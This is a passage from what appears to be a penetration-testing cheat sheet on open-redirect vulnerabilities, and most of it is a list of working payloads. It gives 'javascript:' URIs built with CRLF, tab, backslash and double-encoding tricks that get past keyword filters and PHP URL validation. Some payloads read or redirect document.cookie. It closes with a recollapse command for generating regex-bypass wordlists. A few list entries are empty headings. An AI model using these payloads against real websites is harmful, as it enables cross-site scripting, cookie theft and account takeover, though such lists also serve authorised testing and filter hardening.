Identification
The following is a list of common injection parameters:
Redirect to localhost or arbitrary domains
- Localhost
Try reaching localhost, potentially identify internal open ports:
Wordlist:
- Arbitrary domains
Use different encoding formats to bypass the regex.
Examples:
Open Redirect to XSS
Basic payload, javascript code is executed after "javascript:"
Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)
Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)
Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0
Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
- Fuzzing Lists
- Oralyzer
- Recollapse
Once obtained an openredirect, if we want to redirect to a malicious site, we can generate a wordlist that will try to bypass regex.
recollapse -e 1 -p 1,2,4 -r 10-11 https://legit.example.com